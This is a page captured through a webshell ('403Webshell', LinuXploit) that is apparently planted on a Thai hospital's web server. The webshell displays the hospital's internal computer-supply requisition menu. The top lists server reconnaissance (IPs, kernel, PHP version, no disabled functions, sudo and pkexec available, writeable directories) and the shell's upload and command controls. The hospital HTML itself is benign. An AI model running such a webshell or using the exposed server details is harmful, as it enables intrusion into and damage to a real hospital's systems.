403Webshell
Server IP : 134.236.49.22  /  Your IP : 216.73.216.114
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/Menu pusdu/year60/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/Menu pusdu/year60/index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>ใบเบิกพัสดุคอมพิวเตอร์ โรงพยาบาลสัตหีบ กม.10</title>
<style type="text/css">
<!--
.style11 {font-size: 12px}
.style12 {color: #FF0000}
.style14 {color: #CC6600}
.style15 {font-size: 12px; color: #FF0000; }
.style16 {
	color: #FFFFFF;
	font-size: 14px;
}
-->
</style>
 <link rel="stylesheet" href="style.css" type="text/css" media="screen"> 
 <!--[if IE ]> 
 <link href="ie.css" rel="stylesheet" type="text/css"> 
 <![endif]--> 
 <style type="text/css"> 
 #url { width: 250px; height: 27px; font-size: 18px; font-family: Arial; } 
 #submitButton { font-family: arial; } 
 </style> 
 <script type="text/javascript"> 
 window.onload=function() { 
 var obj = document.getElementById('url'); // See difference? 
 if (obj) { 
 obj.onchange=function() { return JumpToIt(this); }; 
 document.getElementById('submitButton').style.display='none'; 
 } 
 } 
 // 
 function JumpToIt(selectObject) { 
 var ind = selectObject.selectedIndex; 
 if (ind==0) { alert('Please select a URL.'); } 
 else { 
 document.location = selectObject.options[ind].value; 
 } 
 return false; 
 } 
</script> 
</head>

<body>

<!-- เปลี่ยนสีเมาส์ เรนโบว์ -->
<style> 
<!-- 
a{text-decoration:none} 
//.style55 {font-size: 16}
.style56 {color: #FFFFFF}
.style11 {font-size: 12px}
.style57 {color: #0099FF}
.style58 {color: #FF3333; font-size: 14px; }
.style59 {font-size: 14px}
--> 
</style> 
<SCRIPT language=JavaScript> 
var rate = 20; // Increase amount(The degree of the transmutation) 
var obj; // The object which event occured in 
var act = 0; // Flag during the action 
var elmH = 0; // Hue 
var elmS = 128; // Saturation 
var elmV = 255; // Value 
var clrOrg; // A color before the change 
var TimerID; // Timer ID 
if (navigator.appName.indexOf("Microsoft",0) != -1 && parseInt(navigator.appVersion) >= 4) { 
Browser = true; 
} else { 
Browser = false; 
} 
if (Browser) { 
document.onmouseover = doRainbowAnchor; 
document.onmouseout = stopRainbowAnchor; 
} 
function doRainbow() 
{ 
if (Browser && act != 1) { 
act = 1; 
obj = event.srcElement; 
clrOrg = obj.style.color; 
TimerID = setInterval("ChangeColor()",100); 
} 
} 
function stopRainbow() 
{ 
if (Browser && act != 0) { 
obj.style.color = clrOrg; 
clearInterval(TimerID); 
act = 0; 
} 
} 
function doRainbowAnchor() 
{ 
if (Browser && act != 1) { 
obj = event.srcElement; 
while (obj.tagName != 'A' && obj.tagName != 'BODY') { 
obj = obj.parentElement; 
if (obj.tagName == 'A' || obj.tagName == 'BODY') 
break; 
} 
if (obj.tagName == 'A' && obj.href != '') { 
act = 1; 
clrOrg = obj.style.color; 
TimerID = setInterval("ChangeColor()",100); 
} 
} 
} 
function stopRainbowAnchor() 
{ 
if (Browser && act != 0) { 
if (obj.tagName == 'A') { 
obj.style.color = clrOrg; 
clearInterval(TimerID); 
act = 0; 
} 
} 
} 
function ChangeColor() 
{ 
obj.style.color = makeColor(); 
} 
function makeColor() 
{ 
if (elmS == 0) { 
elmR = elmV; elmG = elmV; elmB = elmV; 
} 
else { 
t1 = elmV; 
t2 = (255 - elmS) * elmV / 255; 
t3 = elmH % 60; 
t3 = (t1 - t2) * t3 / 60; 
if (elmH < 60) { 
elmR = t1; elmB = t2; elmG = t2 + t3; 
} 
else if (elmH < 120) { 
elmG = t1; elmB = t2; elmR = t1 - t3; 
} 
else if (elmH < 180) { 
elmG = t1; elmR = t2; elmB = t2 + t3; 
} 
else if (elmH < 240) { 
elmB = t1; elmR = t2; elmG = t1 - t3; 
} 
else if (elmH < 300) { 
elmB = t1; elmG = t2; elmR = t2 + t3; 
} 
else if (elmH < 360) { 
elmR = t1; elmG = t2; elmB = t1 - t3; 
} 
else { 
elmR = 0; elmG = 0; elmB = 0; 
} 
} 
elmR = Math.floor(elmR); 
elmG = Math.floor(elmG); 
elmB = Math.floor(elmB); 
clrRGB = '#' + elmR.toString(16) + elmG.toString(16) + elmB.toString(16); 
elmH = elmH + rate; 
if (elmH >= 360) 
elmH = 0; 
return clrRGB; 
} 
</SCRIPT>
<!-- จบแทกเปลี่ยนสีเรนโบว์-->

<center>
<div align="center"><img src="img/Headerstation.jpg" width="653" height="121" /><br />
    <table width="655" border="0">
      <tr bgcolor="#42FFFF">
        <td width="103"><form id="my-form" action="capture-submit.php" method="get">
            <div align="left"><a href="../year59/index.html" target="_blank" class="style12 target= style11"" style="text-decoration: none;"_parent>รายงานวัสดุคอมปี 59 </a></div>
          </form></td>
        <td width="542"><div align="right"><span class="style11">รายงานรวมการเบิกพัสดุคอมพิวเตอร์ในแต่ละเดือน</span>
            <select name="url" id="url">
              <option value="">กรุณาเลือกเดือนที่จะดูรายงาน</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount1admin.php">มกราคม 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount2admin.php">กุมภาพันธ์ 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount3admin.php">มีนาคม 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount4admin.php">เมษายน 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount5admin.php">พฤษภาคม 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount6admin.php">มิถุนายน 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount7admin.php">กรกฏาคม 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount8admin.php">สิงหาคม 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount9admin.php">กันยายน 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount10admin.php">ตุลาคม 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount11admin.php">พฤศจิกายน 2560</option>
              <option value="http://10.0.0.10/Menu%20pusdu/year60/showalladmin/mount12admin.php">ธันวาคม 2560</option>
              </select>
        </div></td>
      </tr>
    </table>
    <table width="650" height="358" border="2">
    <tr>
      <td width="638" height="350"><table width="644" height="675" border="0">
        <tr>
          <td width="22" height="671" bordercolor="#FFFFFF">&nbsp;</td>
          <td width="324" bordercolor="#FFFFFF"><p class="style12">กรุณาเลือกหน่วยงานของท่านเพื่อเบิกพัสดุ</p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/com/index.html" target="_parent" class="style14" style="text-decoration: none;">ศูนย์คอม</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30604) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/pharma/index.html" target="_parent" class="style14" style="text-decoration: none;">เภสัชกรรม</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30501) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/lab/index.html" target="_parent" class="style14" style="text-decoration: none;">ชันสูตร</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30502)</span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/strategy/index.html" target="_parent" class="style14" style="text-decoration: none;">ยุทธศาสตร์</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30601) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/manage/index.html" target="_parent" class="style14" style="text-decoration: none;">บริหารงานทั่วไป</a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30101 ผอ) (30102 การเงินบัญชี) (30104 พัสดุ)<br>
			  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30103 ธุรการ HR) (30107 โสตสถานที่) (30108 ช่าง)</span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/insuranc/index.html" target="_parent" class="style14" style="text-decoration: none;">ประกันสุขภาพ</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30105) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/massage/index.html" target="_parent" class="style14" style="text-decoration: none;">แพทย์แผนไทย</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30204) (30205กายภาพ) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/OR/index.html" target="_parent" class="style14" style="text-decoration: none;">ห้องผ่าตัด (OR) </a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30406)</span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/plutaluang/index.html" target="_parent" class="style14" style="text-decoration: none;">PCU พลูตาหลวง </a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30301)</span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="km1/index.html" target="_parent" class="style14" style="text-decoration: none;">ศูนย์สุขภาพชุมชนตำบลสัตหีบ</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30302) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/er/index.html" target="_parent" class="style14" style="text-decoration: none;">ฉุกเฉิน (ER)</a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30402) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/ic/index.html" target="_parent" class="style14" style="text-decoration: none;">IC</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30407)  (30106 env) </span><br />
              <br />
            </p>
            <p align="left"><a href="http://10.0.0.10/Menu%20pusdu/year60/showall/index.html" target="_parent" class="style16" style="text-decoration: none;">admin check</a><br />
              <br />
            </p></td>
          <td width="278" bordercolor="#FFFFFF"><p class="style12">&nbsp;</p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/supply/index.html" target="_parent" class="style14" style="text-decoration: none;">ห้องซักฟอกหน่วยจ่ายกลาง</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30408) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/canteen/index.html" target="_parent" class="style14" style="text-decoration: none;">โภชนาการ</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30504) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/lr/index.html" target="_parent" class="style14" style="text-decoration: none;">ห้องคลอด (LR) </a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30405) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/ward/index.html" target="_parent" class="style14" style="text-decoration: none;">ผู้ป่วยใน (Ward)</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30404)</span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/opd/index.html"  target="_parent" class="style14" style="text-decoration: none;">ผู้ป่วยนอก (OPD)</a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30403)</span> </p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/pharmastore/index.html"  target="_parent" class="style14" style="text-decoration: none;">คลังยา</a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30501) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/driver/index.html" target="_parent" class="style14" style="text-decoration: none;">หน่วยงานยานพาหนะ</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30109) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/dental/index.html" target="_parent" class="style14" style="text-decoration: none;">ห้องทันตกรรม</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30202คลินิค) (30203ชุมชน) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/doctor/index.html" target="_parent" class="style14" style="text-decoration: none;">ห้องพักแพทย์ </a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30201)</span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/room4/index.html" target="_parent" class="style14" style="text-decoration: none;">คลีนิคพิเศษ</a> <br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30401) </span></p>
            <p align="left"><img src="../../images/logo/arr.gif" width="10" height="10" border="0" /> <a href="http://10.0.0.10/Menu%20pusdu/year60/xray/index.html" target="_parent" class="style14" style="text-decoration: none;">รังสี (X-ray) </a><br />
              <span class="style11">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(30503) </span></p>
            <p align="left">&nbsp;</p>
            <p align="left">&nbsp;</p>
            <p align="left"><span class="style15"><br />
              * การเบิกหมึก กรุณาเบิกเดือนต่อเดือน ห้ามเบิกไป stock หลายๆเดือน </span></p>
            <span class="style15">* หน่วยงานใดไม่มีชื่อในรายการ กรุณาแจ้งศูนย์คอม </span></td>
        </tr>
      </table>
      
  </table>
  <table width="655" height="51" border="0">
    <tr>
      <td width="633"><embed height="96" type="application/x-shockwave-flash" width="649" src="../../Flash On web/footerflash1.swf" wmode="transparent"></embed></td>
    </tr>
  </table>
  <img src="img/Header1.jpg" width="656" height="82" />
  <br>
<img src="img/Footer.png" width="654" height="69" /></div>
<p align="center"><span class="style11">Copyright<img src="../../../images/logo/copyright.jpg" width="13" height="16" />  2010 Pozedorn@gmail.com sattahip km.10 hospital.</span><br clear="all" />
  <strong> </strong></p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit